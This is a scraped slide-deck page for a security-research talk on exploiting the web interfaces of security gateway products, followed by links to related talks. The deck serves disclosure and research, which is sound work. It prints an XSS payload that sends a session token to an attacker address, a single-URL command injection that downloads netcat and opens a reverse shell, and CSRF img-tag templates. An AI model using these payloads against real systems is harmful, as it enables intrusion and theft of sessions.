they ought to know better exploiting security gateways
play

They ought to know better: Exploiting Security Gateways via their - PowerPoint PPT Presentation

Aug 30, 2022 •169 likes •580 views

They ought to know better: Exploiting Security Gateways via their Web Interfaces Ben Williams NGS-Secure NCC Group Plc, Manchester Technology Centre, Oxford Road, Manchester M1 7EF www.nccgroup.com Introduction 35+ Exploits found and

  1. They ought to know better: Exploiting Security Gateways via their Web Interfaces Ben Williams NGS-Secure NCC Group Plc, Manchester Technology Centre, Oxford Road, Manchester M1 7EF www.nccgroup.com

  2. Introduction § 35+ Exploits found and reported to vendors of Security Gateways since October 2011 § Many are serious issues which can lead an external attacker to compromise the Gateway § Owning the Gateway can be quick, and powerful… as I will show you…

  3. Which kind of products? § Security Gateways - Multifunction Security Gateways - Email and Web filtering § Appliances and Software § Some examples include: - ClearOS, Untangle, McAfee, Proofpoint, Barracuda - Websense, Symantec (Brightmail)

  4. How are they deployed?

  5. What do they look like? Screenshots removed for slides

  6. My Exploit Research method § Find vendor site, sign-up § Download product evaluation - get eval-key (30 days) § Install VM and snapshot § “Blast it” with automated scanners § Prod and poke it with Burp - (majority of time) § SSH as root for whitebox testing § Create/test exploits § Log and report exploits

  7. Common vulnerabilities found § Input-validation issues (90% of products) - XSS, command-injection, SQLi, parameter-tampering § Predictable URLs & parameters = CSRF § Excessive privileges § Various session-management issues § Authentication bypass and information- disclosure § Out-of-date software, default configs/ content § Brute force password guessing - (too basic but lots of it)

  8. Attack stages § Phase one: - Gaining access to the UI § Phase two: - Gaining access to the operating- system

  9. Interesting examples 1 § ClearOS - Information disclosure

  10. Video removed for slides

  11. Video removed for slides

  12. Recap – UI ownage

  13. Video removed for slides

  14. Recap – Root shell and pivoting

  15. Post exploitation § It’s common for useful tools to be already installed - gcc - tcpdump - netcat - Nmap - Perl/Python - yum/apt-get - stunnel § File-system frequently not “hardened” - No SELinux

  16. Other session-token disclosure Screenshots removed for slides

  17. More session-tokens – bypassing cookie security § Bypass cookie security flags (Http-Only) § Session-token reflected on a page with XSS = Pull session–token out of the DOM, send to attacker https://192.168.1.42:9999/xxxx? xxxx=SrvCtrl&method=get&cmd=listtags&s erver=<img src=nothing onerror='document.write("<img src= \"http://192.168.1.50/"+ (document.firstChild.innerHTML.substr(312,2 4)) + "\"")'>

  18. Attack scenarios § Direct access to the Security Gateway UI - Auth-bypass, session-hijacking, information-disclosure § No direct access to the UI - CSRF, XSS - (Requires reconnaissance, and interaction with users) - Special case of CSRF - OSRF with out-of-band XSS

  19. CSRFing Website users <html> <img src=" http://www.example.com/sensitive- function?dosomthing=nasty" height=“0” width=“0”> </html>

  20. CSRFing Home routers <html> <img src=" http://192.168.1.254:81/sensitive- function?dosomthing=nasty" height=“0” width=“0”> </html>

  21. CSRFing Corporate Security Gateways Attacker Victim

  22. Interesting examples 2 § Websense - Unauthenticated command-injection as SYSTEM - Advanced CSRF

  23. Reverse shell from single URL https://192.168.1.42:xxxx/xxxx?xxxx=echo ¡.pdf%26echo ¡strUrl ¡%3d ¡^"http:^" ¡%2b ¡ chr(47) ¡%2b ¡chr(47) ¡%2b ¡^"192.168.233.11^" ¡%2b ¡chr(47) ¡%2b ¡^"nc.exe^"> ¡http.vbs %26echo ¡StrFile ¡%3d ¡^"nc.exe^" ¡>> ¡http.vbs%26echo ¡Const ¡ HTTPREQUEST_PROXYSETTING_DEFAULT ¡%3d ¡0 ¡>> ¡http.vbs%26echo ¡Const ¡ HTTPREQUEST_PROXYSETTING_PRECONFIG ¡%3d ¡0 ¡>> ¡http.vbs%26echo ¡Const ¡ HTTPREQUEST_PROXYSETTING_DIRECT ¡%3d ¡1 ¡>> ¡http.vbs%26echo ¡Const ¡ HTTPREQUEST_PROXYSETTING_PROXY ¡%3d ¡2 ¡>> ¡http.vbs%26echo ¡Dim ¡http, ¡varByteArray, ¡ strData, ¡strBuffer, ¡lngCounter, ¡fs, ¡ts ¡>> ¡http.vbs%26echo ¡ ¡ ¡Err.Clear ¡>> ¡http.vbs %26echo ¡ ¡ ¡Set ¡http ¡%3d ¡Nothing ¡>> ¡http.vbs%26echo ¡ ¡ ¡Set ¡http ¡%3d ¡ CreateObject(^"WinHttp.WinHttpRequest.5.1^") ¡>> ¡http.vbs%26echo ¡ ¡ ¡If ¡http ¡Is ¡ Nothing ¡Then ¡Set ¡http ¡%3d ¡CreateObject(^"WinHttp.WinHttpRequest^") ¡>> ¡http.vbs %26echo ¡ ¡ ¡If ¡http ¡Is ¡Nothing ¡Then ¡Set ¡http ¡%3d ¡ CreateObject(^"MSXML2.ServerXMLHTTP^") ¡>> ¡http.vbs%26echo ¡ ¡ ¡If ¡http ¡Is ¡Nothing ¡ Then ¡Set ¡http ¡%3d ¡CreateObject(^"Microsoft.XMLHTTP^") ¡>> ¡http.vbs%26echo ¡ ¡ ¡ http.Open ¡^"GET^", ¡strURL, ¡False ¡>> ¡http.vbs%26echo ¡ ¡ ¡http.Send ¡>> ¡http.vbs%26echo ¡ ¡ ¡ varByteArray ¡%3d ¡http.ResponseBody ¡>> ¡http.vbs%26echo ¡ ¡ ¡Set ¡http ¡%3d ¡Nothing ¡>> ¡ http.vbs%26echo ¡ ¡ ¡Set ¡fs ¡%3d ¡CreateObject(^"Scripting.FileSystemObject^") ¡>> ¡ http.vbs%26echo ¡ ¡ ¡Set ¡ts ¡%3d ¡fs.CreateTextFile(StrFile, ¡True) ¡>> ¡http.vbs%26echo ¡ ¡ ¡ strData ¡%3d ¡^"^" ¡>> ¡http.vbs%26echo ¡ ¡ ¡strBuffer ¡%3d ¡^"^" ¡>> ¡http.vbs%26echo ¡ ¡ ¡For ¡ lngCounter ¡%3d ¡0 ¡to ¡UBound(varByteArray) ¡>> ¡http.vbs%26echo ¡ ¡ ¡ ¡ ¡ ¡ ¡ts.Write ¡Chr(255 ¡ And ¡Ascb(Midb(varByteArray,lngCounter ¡%2b ¡1, ¡1))) ¡>> ¡http.vbs%26echo ¡ ¡ ¡Next ¡>> ¡ http.vbs%26echo ¡ ¡ ¡ts.Close ¡>> ¡http.vbs%26http.vbs%26nc.exe ¡192.168.233.11 ¡443 ¡-­‑e ¡ cmd.exe| ¡

  24. But how to exploit it?

  25. Problems with CSRFing internal products from outside § Who is the admin? § How do you get the admin to click something malicious whilst logged- in? § Product-UI port locked down to specific users? § Don’t know internal IP address of the product in advance?

  26. Ways to find DMZ IP addresses § From SMTP relays bounced messages § Misconfigured Web servers

  27. CSRF a whole subnet <html> <img src= http://192.168.1.1:xxxx/...etc... <img src= http://192.168.1.2:xxxx/...etc... <img src= http://192.168.1.3:xxxx/...etc... <img src= http://192.168.1.4:xxxx/...etc... <img src= http://192.168.1.5:xxxx/...etc... <img src= http://192.168.1.6:xxxx/...etc... <img src= http://192.168.1.7:xxxx/...etc... ...etc...

  28. Use the browser (and proxy)

  29. There’s no place like localhost § 127.0.0.1 § 127.0.0.2 § There are millions of ways of representing localhost, that the browser will not spot, and will send to the proxy, but the proxy will treat as localhost

  30. CSRF proxy attack

  31. Proxy-killer <html> <img src= http://127.0.0.2:xxxx/...etc... </html>

  32. Did you understand that?

  33. Interesting examples 3 § Proofpoint ¡(video/demo) ¡ -­‑ Enumerate ¡email ¡addresses -­‑ OSRF ¡via ¡email ¡

  34. Video removed for slides

  35. Video removed for slides

  36. Video removed for slides

  37. Recap – UI ownage via OSRF

  38. Spot the problem

  39. Conclusion § Exploiting Security Gateway products offers powerful positions for an attacker § Wide range of issues, some very serious - Some easy to find, some harder § Most techniques used are several years old § I feel there is a big knowledge gap between secure website development and secure UI development

  40. Further research § This is a rich area for exploit- development - 35+ Exploits found so far in Security Gateways (just takes time) - Lots of similar products vulnerable to similar attacks § Other types of product - Daniel Compton – Similar project but for Network-Monitoring software ~ 35+ exploits so far - I’ve started looking at SSL VPNs

  41. Questions and suggestions § Whitepaper available at BlackHat EU § Company Website: http://www.ngssecure.com § Personal Blog: http://insidetrust.blogspot.com § QUESTIONS?

Recommend

Sending out an SMS : Characterizing the Security of the SMS Ecosystem with Public Gateways

Sending out an SMS : Characterizing the Security of the SMS Ecosystem with Public Gateways

Sending out an SMS : Characterizing the Security of the SMS Ecosystem with Public Gateways Bradley Reaves , Nolen Scaife, Dave Tian, Logan Blue, Patrick Traynor, Kevin R. B. Butler Florida Institute of Cyber Security (FICS) SMS Ecosystem Cell

404 views • 14 slides
Tunneling and Gateways Tunneling and Gateways Examples Gateways Motivation

Tunneling and Gateways Tunneling and Gateways Examples Gateways Motivation

Topics Topics Tunneling Motivation Terminology Tunneling and Gateways Tunneling and Gateways Examples Gateways Motivation Interoperability Srinidhi Varadarajan Remote provisioning of functionality Enhanced

360 views • 7 slides
On Using Application-Layer Middlebox Protocols for Peeking Behind NAT Gateways Teemu Rytilahti,

On Using Application-Layer Middlebox Protocols for Peeking Behind NAT Gateways Teemu Rytilahti,

On Using Application-Layer Middlebox Protocols for Peeking Behind NAT Gateways Teemu Rytilahti, Thorsten Holz Horst Grtz Institute for IT-Security, Ruhr University Bochum, Germany Network and Distributed System Security Symposium 2020 1

581 views • 46 slides
Tunneling and Gateways Tunneling and Gateways Srinidhi Varadarajan Topics Topics Tunneling

Tunneling and Gateways Tunneling and Gateways Srinidhi Varadarajan Topics Topics Tunneling

Tunneling and Gateways Tunneling and Gateways Srinidhi Varadarajan Topics Topics Tunneling Motivation Terminology Examples Gateways Motivation Interoperability Remote provisioning of functionality Enhanced

874 views • 37 slides
Exploiting symmetries when proving equivalence properties for security protocols Vincent Cheval,

Exploiting symmetries when proving equivalence properties for security protocols Vincent Cheval,

Exploiting symmetries when proving equivalence properties for security protocols Vincent Cheval, Steve Kremer, Itsaka Rakotonirina Inria Nancy Grand-Est Security protocols TLS Wifi @ PASS E-voting E-passport 2 24 Security protocols

830 views • 69 slides
Gateways: Access to Jewish Education Mission: Gateways provides high quality special education

Gateways: Access to Jewish Education Mission: Gateways provides high quality special education

Gateways: Access to Jewish Education Mission: Gateways provides high quality special education services, expertise and support to enable students with diverse learning needs to succeed in Jewish educational settings and participate meaningfully

1.08k views • 65 slides
Defeating Android security solutions by exploiting fuzzy hashing (updated) Arash Vahidi RISE

Defeating Android security solutions by exploiting fuzzy hashing (updated) Arash Vahidi RISE

Defeating Android security solutions by exploiting fuzzy hashing (updated) Arash Vahidi RISE resund Security Day, 2019 The early morning opening slide... There are two types of crypto talks... 1. We present a third preimage attack on

435 views • 21 slides
Exploiting Unix File-System Races via Algorithmic Complexity Attacks By Cai, Gui, Johnson

Exploiting Unix File-System Races via Algorithmic Complexity Attacks By Cai, Gui, Johnson

Systems and Internet Infrastructure Security Network and Security Research Center Department of Computer Science and Engineering Pennsylvania State University, University Park PA Exploiting Unix File-System Races via Algorithmic Complexity

643 views • 31 slides
WEP/WPA2 WiFi Password Security &amp; Exploiting IP Based Surveillance Cameras By Basiru

WEP/WPA2 WiFi Password Security &amp; Exploiting IP Based Surveillance Cameras By Basiru

WEP/WPA2 WiFi Password Security &amp; Exploiting IP Based Surveillance Cameras By Basiru Mohammed Rajkumar Ramadhin Alexander Martin Introduction With growing advancement in the &quot;Internet of Things&quot; we must take a look at the

468 views • 29 slides
Exploiting Sequence of Events for Potential Attack Detection in Network Security using Machine

Exploiting Sequence of Events for Potential Attack Detection in Network Security using Machine

Exploiting Sequence of Events for Potential Attack Detection in Network Security using Machine Learning Ashrith Barthur, PhD Security Research @cyberbaggage H 2 O .ai Machine Intelligence Sequence of Events (SoE) What is a Sequence of

636 views • 35 slides
Spectre Attacks: Exploiting Speculative Execution IEEE Security &amp; Privacy (May 20, 2019) Paul

Spectre Attacks: Exploiting Speculative Execution IEEE Security &amp; Privacy (May 20, 2019) Paul

Spectre Attacks: Exploiting Speculative Execution IEEE Security &amp; Privacy (May 20, 2019) Paul Kocher 1 , Jann Horn 2 , Anders Fogh 3 , Daniel Genkin 4 , Daniel Gruss 5 , Werner Haas 6 , Mike Hamburg 7 , Mortiz Lipp 5 , Stefan Mangard 5 ,

410 views • 13 slides
Exploiting type systems and static analyses for smart card security Xavier Leroy INRIA

Exploiting type systems and static analyses for smart card security Xavier Leroy INRIA

Exploiting type systems and static analyses for smart card security Xavier Leroy INRIA Rocquencourt &amp; Trusted Logic 1 Outline 1. What makes strongly typed programs more secure? 2. Enforcing strong typing (bytecode verification). 3.

828 views • 45 slides
Title Slide Team Intro to Presentation Purpose Characteristics to be examined

Title Slide Team Intro to Presentation Purpose Characteristics to be examined

Title Slide Team Intro to Presentation Purpose Characteristics to be examined Gateways selected and why Methods used to examine the gateways Etc Locations of Gateways Chosen University Drive East TAMU Main Campus

303 views • 7 slides
Exploiting Live Virtual Machine Migration Jon Oberheide University of Michigan February 21,

Exploiting Live Virtual Machine Migration Jon Oberheide University of Michigan February 21,

Exploiting Live Virtual Machine Migration Jon Oberheide University of Michigan February 21, 2008 Black Hat DC - Game Plan Introduction to VM migration Live migration security Exploiting live migration Future attacks and

441 views • 31 slides
Di ff erentially-Private Batch Query Answering Exploiting the Workload vs. Exploiting the Data

Di ff erentially-Private Batch Query Answering Exploiting the Workload vs. Exploiting the Data

Di ff erentially-Private Batch Query Answering Exploiting the Workload vs. Exploiting the Data Gerome Miklau University of Massachusetts, Amherst DIMACS Workshop on Recent Work on Di ff erential Privacy across Computer Science October 2012

1.39k views • 136 slides
Building Blocks for Science Gateways Carol Song, Ph.D. Purdue University International Workshop

Building Blocks for Science Gateways Carol Song, Ph.D. Purdue University International Workshop

GABBs - Reusable Geospatial Data Analysis Building Blocks for Science Gateways Carol Song, Ph.D. Purdue University International Workshop on Science Gateways June 19-21, 2017 This work is supported in part by the NSF grant #1261727 Co-Authors

599 views • 36 slides
Kurma: Secure Geo-distributed Multi-cloud Storage Gateways Ming Chen and Erez Zadok Stony Brook

Kurma: Secure Geo-distributed Multi-cloud Storage Gateways Ming Chen and Erez Zadok Stony Brook

Kurma: Secure Geo-distributed Multi-cloud Storage Gateways Ming Chen and Erez Zadok Stony Brook University File Systems and Storage Lab (FSL) Cloud Storage Gateways l Benefits of cloud gateways Public NAS u Combine advantages of both Cloud

650 views • 51 slides
Why Getting Containers Through Major U.S. Gateways is About to get more Problematic &amp; What

Why Getting Containers Through Major U.S. Gateways is About to get more Problematic &amp; What

Why Getting Containers Through Major U.S. Gateways is About to get more Problematic &amp; What to do About It Ronald D. Widdows JOC TPM Conference Executive Chairman, American Intermodal Management, LLC Longbeach, California February 28,

261 views • 8 slides
New Results for the PTB-PTS Attack on Tunneling Gateways Vincent Roca Ludovic Jacquin Saikou

New Results for the PTB-PTS Attack on Tunneling Gateways Vincent Roca Ludovic Jacquin Saikou

New Results for the PTB-PTS Attack on Tunneling Gateways Vincent Roca Ludovic Jacquin Saikou Fall Jean-Louis Roch GreHack15, Grenoble, November 20 th 2015 1 New Results for the PTB-PTS Attack on Tunneling Gateways Packet Too Big (PTB) or

597 views • 20 slides
Automatic Generation of Network protocol gateways David Bromberg, Laurent Rveillre, Julia

Automatic Generation of Network protocol gateways David Bromberg, Laurent Rveillre, Julia

Automatic Generation of Network protocol gateways David Bromberg, Laurent Rveillre, Julia Lawall and Gilles Muller LaBRI University of Bordeaux Ubiquitous environment 2 LaBRI Heterogeneous protocols 3 LaBRI Gateways for providing

671 views • 55 slides
Leftovers: Leftovers: MPLS, Multicast, MPLS, Multicast, Gateways and Firewalls, Gateways and

Leftovers: Leftovers: MPLS, Multicast, MPLS, Multicast, Gateways and Firewalls, Gateways and

COLE POLYTECHNIQUE FDRALE DE LAUSANNE Leftovers: Leftovers: MPLS, Multicast, MPLS, Multicast, Gateways and Firewalls, Gateways and Firewalls, VPNs VPNs Jean- -Yves Le Boudec Yves Le Boudec Jean Fall 2009 Fall 2009 1 Part 1:

708 views • 50 slides
+ Device Management for OSGi IoT Gateways Luca uca Dazi @ Eurotech Julien ien Vermi rmilla

+ Device Management for OSGi IoT Gateways Luca uca Dazi @ Eurotech Julien ien Vermi rmilla

+ Device Management for OSGi IoT Gateways Luca uca Dazi @ Eurotech Julien ien Vermi rmilla llard @ Sierra Wireless +Agenda Introduction to IoT Gateways and Kura Device Management for OSGi Which Protocols? MQTT LwM2M/CoAP

443 views • 25 slides
The Art of Exploiting Logical Flaws in Web Apps Sumit sid Siddharth Richard deanx

The Art of Exploiting Logical Flaws in Web Apps Sumit sid Siddharth Richard deanx

The Art of Exploiting Logical Flaws in Web Apps Sumit sid Siddharth Richard deanx Dean A GREAT COLLABORATION! 2 competitors working together! Thanks to: 7Safe, Part of PA Consulting Group Portcullis Computer Security Limited

1.17k views • 78 slides
Exploiting the Client Vulnerabilities in Internet E-voting Systems: Hacking Helios 2.0 as an

Exploiting the Client Vulnerabilities in Internet E-voting Systems: Hacking Helios 2.0 as an

Exploiting the Client Vulnerabilities in Internet E-voting Systems: Hacking Helios 2.0 as an Example Saghar Estehghari 1 Yvo Desmedt 1 , 2 1 Department of Computer Science University College London, UK 2 Research Center for Information Security

572 views • 28 slides

More recommend